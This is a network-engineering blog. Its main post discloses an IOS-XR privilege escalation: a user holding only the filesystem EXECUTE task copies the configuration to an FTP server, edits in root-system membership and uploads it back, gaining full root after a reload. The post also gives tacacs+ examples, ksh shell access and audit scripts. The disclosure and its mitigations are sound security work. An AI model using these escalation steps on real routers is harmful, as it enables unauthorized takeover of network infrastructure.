Saturday, October 9, 2010

Admin privileges in IOS, IOS-XR, NX-OS

For all of you who are using tacacs+ for AAA: if you want to assign admin privileges and permissions to your users, this is the configuration that has worked for me across a variety of Cisco devices:

IOS

user = username {
         default service = permit
         service = exec {
                 priv-lvl=15
         }
}

IOS-XR
user = username {
        default service = permit
        service = exec {
                optional task="#root-system"
        }
}

NX-OS

user = username {
        default service = permit
        service = exec {
                optional shell:roles="network-admin"
        }
}

Notes:

1) The above tacacs+ configuration is not the full one; it's just the parts that define the "admin" level for specific users.
2) The "optional" keyword in IOS-XR and NX-OS is used in order to make devices that do not understand these attributes simply ignore them.

If you also want to restrict users to specific commands, then you can use something like the following:

user = username {
         default service = deny
         cmd = terminal {
                 permit length.*
                 permit width.*
         }
         cmd = show {
                 permit radius.statistics
                 permit interface.*
                 permit ip.interface.*
         }
         cmd = clear {
                 permit radius.statistics
         }
}

Generally, command authorization is configured by specifying a list of egrep-style regular expressions to match command arguments and an action which is "deny" or "permit".
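The matching described above, as an added Python example (not part of the tacacs+ server or of this post's configuration): it parses the restricted-user block shown above and evaluates sample commands against it. It assumes first-match-wins, an unanchored search over the argument string, an implicit deny when no expression in a cmd block matches, and "default service" deciding commands that have no cmd block; the sample commands and the "anchored" variant are constructed for illustration.

```python
import re

# The restricted-user block from this post, embedded as sample input.
TAC_USER_BLOCK = """
user = username {
         default service = deny
         cmd = terminal {
                 permit length.*
                 permit width.*
         }
         cmd = show {
                 permit radius.statistics
                 permit interface.*
                 permit ip.interface.*
         }
         cmd = clear {
                 permit radius.statistics
         }
}
"""


def parse_cmd_rules(block):
    """Return (default_permit, {command: [(action, pattern), ...]})."""
    default_permit = False
    rules = {}
    current = None
    for raw in block.splitlines():
        line = raw.strip()
        m = re.match(r"default service\s*=\s*(permit|deny)$", line)
        if m:
            default_permit = m.group(1) == "permit"
            continue
        m = re.match(r"cmd\s*=\s*(\S+)\s*\{$", line)
        if m:
            current = rules.setdefault(m.group(1), [])
            continue
        if line == "}":
            current = None
            continue
        m = re.match(r"(permit|deny)\s+(.+)$", line)
        if m and current is not None:
            current.append((m.group(1), m.group(2)))
    return default_permit, rules


def authorize(default_permit, rules, command, args, anchored=False):
    """Decide one command. Assumed semantics: first matching expression wins,
    no match inside a cmd block means deny, unlisted commands get the default.
    anchored=True evaluates the same expressions with a leading '^' added."""
    if command not in rules:
        return default_permit
    for action, pattern in rules[command]:
        regex = "^" + pattern if anchored else pattern
        if re.search(regex, args):
            return action == "permit"
    return False


def compare(samples):
    """Map each sample command line to (result as written, result if anchored)."""
    default_permit, rules = parse_cmd_rules(TAC_USER_BLOCK)
    results = {}
    for command, args in samples:
        results[f"{command} {args}"] = (
            authorize(default_permit, rules, command, args),
            authorize(default_permit, rules, command, args, anchored=True),
        )
    return results


# Constructed sample commands: (command name, argument string).
SAMPLES = [
    ("show", "interface GigabitEthernet0/0/0/1"),
    ("show", "ip interface brief"),
    ("show", "mpls interface"),
    ("show", "running-config"),
    ("clear", "radius statistics"),
    ("configure", "terminal"),
]

if __name__ == "__main__":
    for line, (as_written, anchored) in compare(SAMPLES).items():
        print(f"{line:40} as written: {as_written!s:5}  anchored: {anchored}")
```

Under these assumptions "show mpls interface" is permitted as written only because "interface.*" is found in the middle of the argument string; with a leading "^" each expression is confined to the start of the arguments.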

Note: Command authorization must be enabled in your router configuration too. Also, some commands (e.g. "clear") might need to have their privilege level changed.

The above configurations are from the freeware tacacs+ server, which has been heavily modified in order to suit our needs. Nevertheless, I believe they can apply to other versions too.

Sunday, September 26, 2010

How to edit text files in IOS-XR - The easy way

Everyone dealing with IOS-XR will know that you have the option of using an editor to edit your RPL (Routing Policy Language) configuration. As of 3.9.1 the available editors are the following:

  • nano
  • emacs
  • vim (enhanced version of vi)
So, instead of entering the configuration line by line in CLI, you can create it using an editor and a temporary file.

The same editors are also available for editing any text file that exists on your router's filesystem. In order to be able to use them, you just have to enter ksh mode by using the hidden "run" command. "run" is referenced briefly on CCO, but its usage is discouraged for everyday operation.

WARNING : Everything below this line is being done at your own risk. You probably don't want to experiment on a production network and you'd better use this functionality only under supervision of Cisco Support.

RP/0/RSP0/CPU0:asr9k#run
# pwd
/disk0a:/usr

QNX kernel:

# uname -a
QNX node0_RSP0_CPU0 6.4.0 2010/01/14-11:12:50PST asr9k ppcbe

All filesystem devices can be found under the root directory:

# cd /
# ls -al | grep ":$"
ls: Operation not supported (./nvram-raw:)
lrwxrwxrwx  1 0         0                11 Jun 14 22:19 bootflash -> /bootflash:
drwxrwxrwx  3 0         0                76 Jan 01  1970 bootflash:
lrwxrwxrwx  1 0         0                14 Jun 14 22:19 compactflash -> /compactflash:
drwxrwxrwx  3 0         0             16384 Sep 15 22:08 compactflash:
drwxrwxrwx  2 0         0               668 Jan 01  1970 configflash:
lrwxrwxrwx  1 0         0                 7 Jun 14 22:19 disk0 -> /disk0:
drwxrwxr-x 35 0         0              4096 Sep 26 21:50 disk0:
drwxrwxr-x  6 0         0              4096 Feb 25  2010 disk0a:
lrwxrwxrwx  1 0         0                 7 Jun 14 22:19 disk1 -> /disk1:
drwxrwxr-x 35 0         0              4096 Sep 26 21:50 disk1:
drwxrwxr-x  4 0         0              4096 Apr 08  2009 disk1a:
lrwxrwxrwx  1 0         0                22 Sep 26 22:07 dumper_bootflash: -> /qsm/dumper_bootflash:
lrwxrwxrwx  1 0         0                25 Sep 26 22:07 dumper_compactflash: -> /qsm/dumper_compactflash:
lrwxrwxrwx  1 0         0                24 Sep 26 22:07 dumper_configflash: -> /qsm/dumper_configflash:
lrwxrwxrwx  1 0         0                18 Sep 26 22:07 dumper_disk0: -> /qsm/dumper_disk0:
lrwxrwxrwx  1 0         0                19 Sep 26 22:07 dumper_disk0a: -> /qsm/dumper_disk0a:
lrwxrwxrwx  1 0         0                18 Sep 26 22:07 dumper_disk1: -> /qsm/dumper_disk1:
lrwxrwxrwx  1 0         0                19 Sep 26 22:07 dumper_disk1a: -> /qsm/dumper_disk1a:
lrwxrwxrwx  1 0         0                21 Sep 26 22:07 dumper_harddisk: -> /qsm/dumper_harddisk:
lrwxrwxrwx  1 0         0                22 Sep 26 22:07 dumper_harddiska: -> /qsm/dumper_harddiska:
lrwxrwxrwx  1 0         0                22 Sep 26 22:07 dumper_harddiskb: -> /qsm/dumper_harddiskb:
lrwxrwxrwx  1 0         0                20 Sep 26 22:07 dumper_lcdisk0: -> /qsm/dumper_lcdisk0:
lrwxrwxrwx  1 0         0                21 Sep 26 22:07 dumper_lcdisk0a: -> /qsm/dumper_lcdisk0a:
lrwxrwxrwx  1 0         0                18 Sep 26 22:07 dumper_nvram: -> /qsm/dumper_nvram:
lrwxrwxrwx  1 0         0                16 Jun 14 22:19 ftp: -> /qsm/dev/fs/ftp:
drwxrwxr-x 14 0         0              4096 Sep 26 21:49 harddisk:
drwxrwxr-x  4 0         0              4096 Aug 25 13:11 harddiska:
drwxrwxr-x  5 0         0              4096 Apr 08  2009 harddiskb:
lrwxrwxrwx  1 0         0                 7 Sep 26 22:07 install -> /disk0:
lrwxrwxrwx  1 0         0                 7 Sep 26 22:07 install_read -> /disk0:
drwxrwxrwx  0 0         0                 1 Jan 01  1970 nvram:
lrwxrwxrwx  1 0         0                16 Jun 14 22:19 rcp: -> /qsm/dev/fs/rcp:
lrwxrwxrwx  1 0         0                17 Jun 14 22:19 tftp: -> /qsm/dev/fs/tftp:

For example, to edit the admin configuration in a much easier way, you just have to move to the correct path and edit the appropriate file (or you can supply the whole path on the same line).

# cd disk0:
# cd config/admin
# pwd
/disk0:/config/admin
# ls -al
total 20
drwxrwxrwx  2 0         0              4096 Sep 15 22:09 .
drwxr-xr-x  6 0         0              4096 Aug 25 13:35 ..
-rw-r--r--  1 0         0               416 Sep 15 22:09 admin.bin
-rwx------  1 0         0               307 Sep 14 19:06 admin.cfg
-rw-r--r--  1 0         0               416 Sep 15 22:09 admin_nonlr.bin
-rwx------  1 0         0               307 Sep 15 22:09 last_used.cfg

Now, you can use nano to edit a file:

# nano admin.cfg


Or you can use emacs, which has some "nice" drop-down menus:

# emacs admin.cfg



Perl is also available, if you want to experiment with scripting...

# perl -v

This is perl, v5.6.0 built for 4k-

Copyright 1987-2000, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5.0 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using `man perl' or `perldoc perl'.  If you have access to the
Internet, point your browser at http://www.perl.com/, the Perl Home Page.

...but I haven't tried to run complex scripts yet.

# cat test.pl
for ($count = 10; $count >= 1; $count--) {
        print "$count\n";
}
print "Ignition!\n";

# perl test.pl
10
9
8
7
6
5
4
3
2
1
Ignition!

The included perl modules are limited and I don't know if it's possible to add external ones.

# pwd
/pkg/lib/perl
# ls -alR

.:
total 156
-rwxrwxrwt  1 0         0             10167 Sep 07 21:46 AutoLoader.pm
dr-xr-xr-x  0 0         0                 1 Jan 01  1970 Carp
-rwxrwxrwt  1 0         0              4166 Sep 07 21:46 Carp.pm
-rwxrwxrwt  1 0         0             28050 Sep 07 21:46 DynaLoader.pm
-rwxrwxrwt  1 0         0             10377 Sep 07 21:46 Exporter.pm
dr-xr-xr-x  0 0         0                 1 Jan 01  1970 Sys
-rwxrwxrwt  1 0         0              3591 Sep 07 21:46 XSLoader.pm
dr-xr-xr-x  0 0         0                 1 Jan 01  1970 cisco
-rwxrwxrwt  1 0         0              2479 Sep 07 21:46 strict.pm
-rwxrwxrwt  1 0         0              2746 Sep 07 21:46 vars.pm
dr-xr-xr-x  0 0         0                 1 Jan 01  1970 warnings
-rwxrwxrwt  1 0         0             14333 Sep 07 21:46 warnings.pm

./Carp:
total 17
-rwxrwxrwt  1 0         0              8632 Sep 07 21:46 Heavy.pm

./Sys:
total 8
-rwxrwxrwt  1 0         0              3719 Sep 07 21:46 Hostname.pm

./cisco:
total 2
dr-xr-xr-x  0 0         0                 1 Jan 01  1970 fm
dr-xr-xr-x  0 0         0                 1 Jan 01  1970 lib

./cisco/fm:
total 23
-rwxrwxrwt  1 0         0              3332 Sep 07 21:46 perl_fm_action.pm
-rwxrwxrwt  1 0         0              4301 Sep 07 21:46 perl_fm_event.pm
-rwxrwxrwt  1 0         0               765 Sep 07 21:46 perl_fm_misc.pm
-rwxrwxrwt  1 0         0              2558 Sep 07 21:46 perl_fm_util.pm

./cisco/lib:
total 5
-rwxrwxrwt  1 0         0              2304 Sep 07 21:46 smtp_lib.pm

./warnings:
total 2
-rwxrwxrwt  1 0         0               794 Sep 07 21:46 register.pm


Note : Since ksh gives you a kind of low level access, you have to be very careful with it.

Monday, September 13, 2010

How to get full root access in IOS-XR with just a single permission

For the last week I've been experimenting with an ASR9000 and IOS-XR, and here is something tricky I found out yesterday.

You may already know that IOS-XR uses a different concept for users' permissions. In IOS you have users and privilege levels, while in IOS-XR you have Users, User Groups, Task Groups and Task IDs. In general, the operational tasks that enable users to control, configure, and monitor the router are represented by Task IDs. A Task ID defines the permission needed to perform a command. Users are associated with sets of Task IDs that define the capabilities of their authorized access to the router. More specifically:

Users belong to User Groups
User Groups include various Task Groups
Task Groups define Read/Write/Execute/Debug Task IDs
Task IDs correspond to specific CLI commands

By following the above relationship in reverse order you end up with the required configuration.

1) In order to find the corresponding Task ID for a CLI command, you can execute the "describe" command followed by the CLI command you're interested in.

RP/0/RSP0/CPU0:asr9k#describe show interfaces
The command is defined in show_interface.parser

Node 0/RSP0/CPU0 has file show_interface.parser for boot package /disk0/asr9k-os-mbi-3.9.1.CSCtg50404-1.0.0/mbiasr9k-rp.vm from asr9k-base
Package:
    asr9k-base
        asr9k-base V3.9.1[00]  Base Package for ASR9K
        Vendor : Cisco Systems
        Desc   : Base Package for ASR9K
        Build  : Built on Sun May  2 09:32:03 EET 2010
        Source : By sjc-lds-511 in /auto/srcarchive4/production/3.9.1/asr9k/workspace for c4.2.1-p0
        Card(s): RP, RP-B, HRP, OC3-POS-4, OC12-POS, GE-3, OC12-POS-4, OC48-POS, E3-OC48-POS, E3-OC12-POS-4, E3-OC3-POS-16, E3-OC3-POS-8, E3-OC3-POS-4, E3-OC48-CH, E3-OC12-CH-4, E3-GE-4, E3-OC3-ATM-4, E3-OC12-ATM-4, E5-CEC, E5-CEC-v2, SE-SEC, NP24-4x10GE, NP24-40x1GE, NP40-40x1GE, NP40-4x10GE, NP40-8x10GE, NP40-2_20_COMBO, NP80-8x10GE, NP80-16x10GE, LC, E3-OC12-CH-1, E7-CEC, A9K-SIP-700
        Restart information:
          Default:
            parallel impacted processes restart

Component:
    pfi-im-cmd V[r39x/4]  PFI show commands

File:
    show_interface.parser
        Card(s)              : RP, DRP, SC
        File type            : Default
        Remotely-hosted      : No
        Local view           : /pkg/parser/show_interface.parser
        Local install path   : /disk0/asr9k-base-3.9.1/parser/show_interface.parser
        Central install path : /disk0/asr9k-base-3.9.1/parser/show_interface.parser


User needs ALL of the following taskids:

        interface (READ)

It will take the following actions:
  Spawn the process:
        show_interface -a

So, for the "sh int" command you need to have access to the "interface (READ)" Task ID. Keep in mind that Task IDs grant permission to perform certain tasks; Task IDs do not deny permission to perform tasks.

2) You create a new Task Group and put the above Task Id under it.

taskgroup TEST-TASKGROUP
 task read interface

3) You create a new User Group and put the above Task Group under it.

usergroup TEST-USERGROUP
 taskgroup TEST-TASKGROUP

4) You create a new user and put the above User Group under it.

username TESTUSER
 group TEST-USERGROUP

Now, when the above user logs in, he will have access only to specific commands that are associated with this Task ID (plus some others which are enabled by default). Also, he will be able to see the configuration of all interfaces.

Before the Task ID was enabled:

RP/0/RSP0/CPU0:asr9k#sh int ?
% This command is not authorized

After the Task ID was enabled:

RP/0/RSP0/CPU0:asr9k#sh int ?
  ATM              ATM Network Interface(s)
  Bundle-Ether     Aggregated Ethernet interface(s)
  Bundle-POS       Aggregated POS interface(s)
  FastEthernet     FastEthernet/IEEE 802.3 interface(s)
  GigabitEthernet  GigabitEthernet/IEEE 802.3 interface(s)
...

IOS-XR uses at least 2 running configurations on the ASR9000. The first one is called admin running configuration and you have to enter admin EXEC mode in order to view or change it. The other is called SDR running configuration and it is like the one that IOS uses (actually you have one running configuration per Secure Domain Router (SDR), but only one SDR is available on the ASR9000).

Only users with root-system privileges can access the administration modes by logging in to the RSP for the owner SDR (called the designated shelf controller (DSC)). Administration modes are used to view and manage system-wide resources and logs. Users with root-system privileges have access to system-wide features and resources. The root-system user is created during the initial boot and configuration of the router.

Now, let's suppose you are a root user and you want to allow a user to check the contents of a directory or a file. The "filesystem" Task ID is the one that will allow the user to execute the "dir" and "more" commands.

RP/0/RSP0/CPU0:asr9k#describe more nvram:classic-rommon-var
...
User needs ALL of the following taskids:

        filesystem (EXECUTE)

...

The following user is allowed to do only that.

RP/0/RSP0/CPU0:asr9k#sh user
test

RP/0/RSP0/CPU0:asr9k#sh user tasks
Task:           filesystem  :                  EXECUTE

With a little bit of searching on the available filesystems, you'll find out that this particular user can also view both the SDR and admin configurations in their full glory! These files are stored in clear text (ASCII) too, so anyone holding the execute operation of the filesystem Task ID can also read their contents.

RP/0/RSP0/CPU0:asr9k#dir disk0:config/admin

Directory of disk0:/config/admin

6810        -rw-  416         Sat Sep 11 18:32:51 2010  admin_nonlr.bin
6811        -rw-  416         Sat Sep 11 18:32:51 2010  admin.bin
9418222     -rwx  307         Sat Sep 11 17:37:09 2010  admin.cfg
6813        -rwx  307         Sat Sep 11 18:32:50 2010  last_used.cfg

1644150784 bytes total (1175237120 bytes free)

RP/0/RSP0/CPU0:asr9k#more disk0:config/admin/admin.cfg
!! IOS XR Admin Configuration 3.9.1
...

RP/0/RSP0/CPU0:asr9k#dir disk0:config/running/alternate_cfg

Directory of disk0:/config/running/alternate_cfg

3991330     -rwx  11312       Sun Sep 12 01:53:25 2010  router.cfg
3991331     -rwx  7558        Tue Sep  7 22:09:15 2010  last_used.cfg

RP/0/RSP0/CPU0:asr9k#more disk0:config/running/alternate_cfg/router.cfg
!! IOS XR Configuration 3.9.1
!! Last configuration change at Sun Sep 12 00:50:30 2010 by xxx
...

The above is not exactly the running configuration, it's like a "backup" one (or a secondary one) which seems to get synced to the actual (or primary) running configuration in special cases, like when you do a reload or activate a package. You can find the actual SDR configuration (in clear text too) under "disk0:/config/lr/running/nvgen" split in various parts:

RP/0/RSP0/CPU0:asr9k#dir disk0:config/lr/running/nvgen

Directory of disk0:/config/lr/running/nvgen

3992098     -rw-  100         Sun Sep 12 21:47:51 2010  nv_cur.cfg
3992099     -rw-  0           Sun Sep 12 21:20:11 2010  sh_admin.cf2
3992100     -rw-  1358        Sun Sep 12 21:47:50 2010  sh_os.cf2
3992101     -rw-  3220        Sun Sep 12 21:20:11 2010  sh_base.cf2
3858651     -rw-  0           Sun Sep 12 21:20:11 2010  sh_base_placed.cf2
3858657     -rw-  74          Sun Sep 12 21:47:50 2010  sh_p_domain_services.cf2
3992104     -rw-  4           Sun Sep 12 21:47:50 2010  sh_p_cdp_mgr.cf2
3858658     -rw-  0           Sun Sep 12 21:20:11 2010  sh_p_ip_expl_paths_daemon.cf2
3858659     -rw-  0           Sun Sep 12 21:20:11 2010  sh_p_rt_check_mgr.cf2
3858660     -rw-  0           Sun Sep 12 21:20:11 2010  sh_p_ipv4_rib.cf2
3992108     -rw-  28          Sun Sep 12 21:47:51 2010  sh_p_arp_gmp.cf2
...

For example, to see the current access lists:

RP/0/RSP0/CPU0:asr9k#more disk0:config/lr/running/nvgen/sh_fwd_acl.cf2
ipv4 access-list 9
 10 permit ipv4 10.21.8.0 0.0.0.255 any
....

If you have some level 7 passwords in the running configuration (something you should avoid doing since you have the "secret" option), then you're probably risking a lot, because these can be easily decrypted. Luckily, the admin configuration doesn't allow such passwords.

What is more interesting is that the execute permission of the filesystem Task ID allows the user to also copy/overwrite a file (some configuration files are not allowed to be deleted, while some others are recreated "automatically" while doing a reload).


Here comes the tricky part...

There are some variables in ROM Monitor mode, that you can use in order to change the paths and names of configuration files, bypassing the normal startup procedure which by default loads the primary (binary) configuration.

For example, to permanently change the location of the default admin configuration file:

IOX_ADMIN_CONFIG_FILE=drive:path/file

To permanently change the location of the router configuration file:

IOX_CONFIG_FILE=drive:path/file 

To permanently change the default location where configuration files are saved:

IOX_CONFIG_MEDIUM=drive:path

Using the "set" command while in rommon will display their current values:

rommon B1 > set
...
IOX_ADMIN_CONFIG_FILE=
IOX_CONFIG_FILE=
IOX_CONFIG_MEDIUM=
...

Again, all the above rommon variables are saved in clear text too, so the test user can still find them by simply executing the "more" command from the CLI.

RP/0/RSP0/CPU0:asr9k#more nvram:classic-rommon-var
  PS1 = rommon ! > , IOX_ADMIN_CONFIG_FILE = , BOOT_DEV_SEQ_CONF = disk0:;disk1:, MIRROR_ENABLE = Y, TFTP_VERBOSE = 0, TFTP_RETRY_COUNT = 4, TFTP_TIMEOUT = 6000, TFTP_CHECKSUM = 0, TFTP_MGMT_INTF = 0, TURBOBOOT = , ? = 0, IP_ADDRESS = 10.200.73.34, IP_SUBNET_MASK = 255.255.255.252, DEFAULT_GATEWAY = 10.200.73.33, TFTP_SERVER = 10.21.8.24, ReloadReason = 1, BSI = 0, BOOT_DEV_SEQ_OPER = disk0:, BOOT = disk0:asr9k-os-mbi-3.9.1.CSCtg50404-1.0.0/mbiasr9k-rp.vm,1;, confreg = 0x2102^@

Now let's change IOX_CONFIG_FILE to point to a new configuration file. It doesn't really matter where the file is saved.

rommon B2 > IOX_CONFIG_FILE=disk0:running-config
rommon B3 > sync
rommon B4 > reset

Nothing different until now. The test user can still find and see the running-config as "expected":

RP/0/RSP0/CPU0:asr9k#more nvram:classic-rommon-var
  PS1 = rommon ! > , IOX_ADMIN_CONFIG_FILE = , BOOT_DEV_SEQ_CONF = disk0:;disk1:, MIRROR_ENABLE = Y, TFTP_VERBOSE = 0, TFTP_RETRY_COUNT = 4, TFTP_TIMEOUT = 6000, TFTP_CHECKSUM = 0, TFTP_MGMT_INTF = 0, TURBOBOOT = , IP_ADDRESS = 10.200.73.34, IP_SUBNET_MASK = 255.255.255.252, DEFAULT_GATEWAY = 10.200.73.33, TFTP_SERVER = 10.21.8.24, ReloadReason = 1, ? = 0, IOX_CONFIG_FILE = disk0:running-config, BSI = 0, BOOT_DEV_SEQ_OPER = disk0:, BOOT = disk0:asr9k-os-mbi-3.9.1.CSCtg50404-1.0.0/mbiasr9k-rp.vm,1;, confreg = 0x2102^@

RP/0/RSP0/CPU0:asr9k#more disk0:running-config
!! IOS XR Configuration 3.9.1
!! Last configuration change at Mon Sep 13 01:58:33 2010 by xxx
...

Test user is still a member of the TESTGROUP User Group, which has limited access.

RP/0/RSP0/CPU0:asr9k#sh user tasks
Task:           filesystem  :                  EXECUTE

Step 1 : Test user copies the running configuration to a ftp server:

RP/0/RSP0/CPU0:asr9k#copy disk0:running-config ftp://10.21.8.24/test-config
Destination filename [test-config]?
Writing ftp://10.21.8.24/test-config
C
11314 bytes copied in      0 sec

Step 2 : Test user changes the contents of the above file in order to make himself member of the root-system User Group and uploads it in the same path as the original configuration, overwriting it.

RP/0/RSP0/CPU0:asr9k#copy ftp://10.21.8.24/test-config disk0:running-config
Destination filename [/disk0:/running-config]?
Copy : Destination exists, overwrite ?[confirm]
Accessing ftp://10.21.8.24/test-config
C
11311 bytes copied in      0 sec

Step 3 : Test user verifies that his changes are actually on the uploaded file:

RP/0/RSP0/CPU0:asr9k#more disk0:running-config
!! IOS XR Configuration 3.9.1
!! Last configuration change at Mon Sep 13 01:58:33 2010 by xxx
...
username test
 group root-system

Step 4 : A little bit later a Root user makes a reload and voila! Test user gets root access!

RP/0/RSP0/CPU0:asr9k#sh user
test

RP/0/RSP0/CPU0:asr9k#sh user tasks
Task:                  aaa  : READ    WRITE    EXECUTE    DEBUG
Task:                  acl  : READ    WRITE    EXECUTE    DEBUG
Task:                admin  : READ    WRITE    EXECUTE    DEBUG
Task:                 ancp  : READ    WRITE    EXECUTE    DEBUG
Task:                  atm  : READ    WRITE    EXECUTE    DEBUG
Task:       basic-services  : READ    WRITE    EXECUTE    DEBUG
Task:                 bcdl  : READ    WRITE    EXECUTE    DEBUG
Task:                  bfd  : READ    WRITE    EXECUTE    DEBUG
Task:                  bgp  : READ    WRITE    EXECUTE    DEBUG

The above happens only when you have set the rommon variable to use a different configuration file.

Exactly the same thing can happen for the admin configuration too. It's even easier there, because you can just upload a new file and overwrite the current one, without having to change the rommon variables. Then you'll get root access to the admin mode, which means you have admin access to the SDR too.

! check our current user credentials
RP/0/RSP0/CPU0:asr9k#sh user task
Task:           filesystem  :                  EXECUTE

! no admin access is allowed
RP/0/RSP0/CPU0:asr9k#admin
% This command is not authorized

! view the current admin config file
RP/0/RSP0/CPU0:asr9k#more disk0:config/admin/admin.cfg
!! IOS XR Admin Configuration 3.9.1
username root
 group root-system
 secret 5 xxx
!
end

! transfer the admin config file to a ftp server
RP/0/RSP0/CPU0:asr9k#copy disk0:config/admin/admin.cfg ftp://10.21.8.24/test-config
Destination filename [test-config]?
Writing ftp://10.21.8.24/test-config
C
384 bytes copied in      0 sec

! edit the admin config file and add a 2nd root user
!! IOS XR Admin Configuration 3.9.1
username root
 group root-system
 secret 5 xxx
!
username test-root
 group root-system
 secret 5 xxx
!
end

! upload the new admin config file and overwrite the old one
RP/0/RSP0/CPU0:asr9k#copy ftp://10.21.8.24/test-config disk0:config/admin/admin.cfg
Destination filename [/disk0:/config/admin/admin.cfg]?
Copy : Destination exists, overwrite ?[confirm]
Accessing ftp://10.21.8.24/test-config
C
465 bytes copied in      0 sec

! view the new admin config file
RP/0/RSP0/CPU0:asr9k#more disk0:config/admin/admin.cfg
!! IOS XR Admin Configuration 3.9.1
username root
 group root-system
 secret 5 xxx
!
username test-root
 group root-system
 secret 5 xxx
!
end

! wait for the admin (or persuade him) to make a reload
...

! test the new root account ;)
RP/0/RSP0/CPU0:asr9k#sh user
test-root
RP/0/RSP0/CPU0:asr9k#sh user task
Task:                  aaa  : READ    WRITE    EXECUTE    DEBUG
Task:                  acl  : READ    WRITE    EXECUTE    DEBUG
Task:                admin  : READ    WRITE    EXECUTE    DEBUG
Task:                 ancp  : READ    WRITE    EXECUTE    DEBUG
Task:                  atm  : READ    WRITE    EXECUTE    DEBUG
Task:       basic-services  : READ    WRITE    EXECUTE    DEBUG
Task:                 bcdl  : READ    WRITE    EXECUTE    DEBUG
...

! admin access is now allowed
RP/0/RSP0/CPU0:asr9k#admin
RP/0/RSP0/CPU0:asr9k(admin)#

What seems strange to me is that the primary configuration in IOS-XR is stored in binary (SysDB) format (you can find it in the same path as above) and the secondary one (which is in ASCII format) should be used only in case of emergency (corruption?). I guess a possible inconsistency between these 2 configurations after the reload, makes the ASCII configuration override the binary one. Keep in mind that while doing the reload, there are no warning messages about configuration inconsistencies.

Admin mode
If the actual admin executes "clear configuration inconsistency" or "cfs check" while in admin mode, the ASCII configuration you just uploaded will be updated by the current running configuration, so the changes will be lost. But, if a reload is executed from admin mode without first giving the above commands, then the test user will get root access after the reload.

SDR mode
If a reload is executed while on SDR, regardless of whether the above two commands are executed too, then there won't be any effect on the admin configurations and the test user will again get root access after the reload. After all, how often do you use the admin EXEC mode?

Imho, filesystem permissions should get re-organized. Critical files or "dynamic" paths where critical files reside should be available under a new Task ID.

Until the above is fixed, you should not allow every user to use the filesystem Task ID, unless there is absolute need to give the above permissions.

If you want to have better control of your users' permissions, you should think of using an external AAA server (e.g. tacacs) and applying attributes that restrict them to executing specific commands with specific arguments.
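One way to audit for the exposure described above, as an added Python example (not from the original post and not a Cisco tool): it resolves username -> usergroup -> taskgroup -> task, then reports users who hold filesystem (EXECUTE) without being in root-system and root-system members who are not on an approved list. The sample configuration is constructed and merges SDR and admin users into one text for brevity; FS-TASKGROUP, FS-USERGROUP and the approved list are hypothetical, and "inherit" statements are not resolved.

```python
ROOT_GROUP = "root-system"   # predefined group, not declared in the configuration

# Constructed sample in the stanza layout shown in this post.
SAMPLE_CONFIG = """\
!! constructed sample, not a real router configuration
taskgroup TEST-TASKGROUP
 task read interface
!
taskgroup FS-TASKGROUP
 task execute filesystem
!
usergroup TEST-USERGROUP
 taskgroup TEST-TASKGROUP
!
usergroup FS-USERGROUP
 taskgroup FS-TASKGROUP
!
username TESTUSER
 group TEST-USERGROUP
!
username test
 group FS-USERGROUP
!
username root
 group root-system
 secret 5 xxx
!
username test-root
 group root-system
 secret 5 xxx
!
end
"""


def parse_aaa(config):
    """Collect taskgroup, usergroup and username stanzas into lookup tables."""
    tables = {"taskgroup": {}, "usergroup": {}, "username": {}}
    kind = name = None
    for raw in config.splitlines():
        words = raw.split()
        if not words or words[0].startswith("!"):
            continue
        if not raw[0].isspace():                  # top-level line opens a stanza
            kind = words[0] if words[0] in tables and len(words) > 1 else None
            if kind:
                name = words[1]
                tables[kind].setdefault(name, set())
            continue
        if kind == "taskgroup" and words[0] == "task" and len(words) == 3:
            tables[kind][name].add((words[1], words[2]))   # (operation, task id)
        elif kind == "usergroup" and words[0] == "taskgroup" and len(words) == 2:
            tables[kind][name].add(words[1])
        elif kind == "username" and words[0] == "group" and len(words) == 2:
            tables[kind][name].add(words[1])
    return tables


def effective_tasks(tables, user):
    """Union of the (operation, task id) pairs a user receives via its groups."""
    tasks = set()
    for group in tables["username"].get(user, ()):
        for taskgroup in tables["usergroup"].get(group, ()):
            tasks |= tables["taskgroup"].get(taskgroup, set())
    return tasks


def audit(config, approved_roots):
    """Return a sorted list of (username, finding) tuples."""
    tables = parse_aaa(config)
    findings = []
    for user in sorted(tables["username"]):
        if ROOT_GROUP in tables["username"][user]:
            if user not in approved_roots:
                findings.append((user, "in root-system but not on the approved list"))
            continue
        if ("execute", "filesystem") in effective_tasks(tables, user):
            findings.append((user, "holds filesystem (EXECUTE) without root-system"))
    return findings


if __name__ == "__main__":
    for user, finding in audit(SAMPLE_CONFIG, approved_roots={"root"}):
        print(f"{user}: {finding}")
```

Run against the ASCII configuration files before and after a reload, the second finding also surfaces a root-system user that was added outside the normal change process.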

Notes:
1) The availability of configuration modes always depends on the software packages that are installed on your system and on the router platform that you are using.
2) You can find a list of all Task IDs under IOS-XR 4.0 and their required permissions here.
3) I'm sure someone else will know a lot more about the IOS-XR internals (after all, everything written above was found by one week's experimentation). Please feel free to submit any corrections.
4) If you happen to have some extra permissions regarding utilities, then you can probably modify the configuration files online, by using xargs, perl, vim.

Saturday, August 28, 2010

Decoding the RIPE BGP experiment

A lot of you probably saw your BGP routers go crazy on Friday 27th of August in the morning, especially if you happened to have a CRS (or another router running IOS-XR, like a C12k or ASR9k) in your (or a near) network.

RIPE and Duke University decided to experiment with Quagga's BGP and the result was to make some routers reset their BGP sessions, because they were receiving malformed BGP update packets. Malformed packets were generated by other routers in the middle, not by the Quagga BGP daemon where the experiment started.

Error messages generated on BGP routers that had peerings with affected (i.e. IOS-XR) routers, were like the following:


%BGP-3-NOTIFICATION: sent to neighbor x.x.x.x 3/1 (update malformed) 188 bytes F0630BB8 00000000 00000000 00000000 00
BGP: x.x.x.x Bad attributes FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF 0118
0200 0000 FD40 0101 0040 0206 0202 0D1C 316E 4003 04C3 10A1 6180 0404 0000 0000 4005 0400 0000 3CC0 081C 0D1C 0002 0D1C 0016 0D1C 0056 0D1C
01F7 0D1C 029A 0D1C 0813 FDE8 FDDE F063 0BB8 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
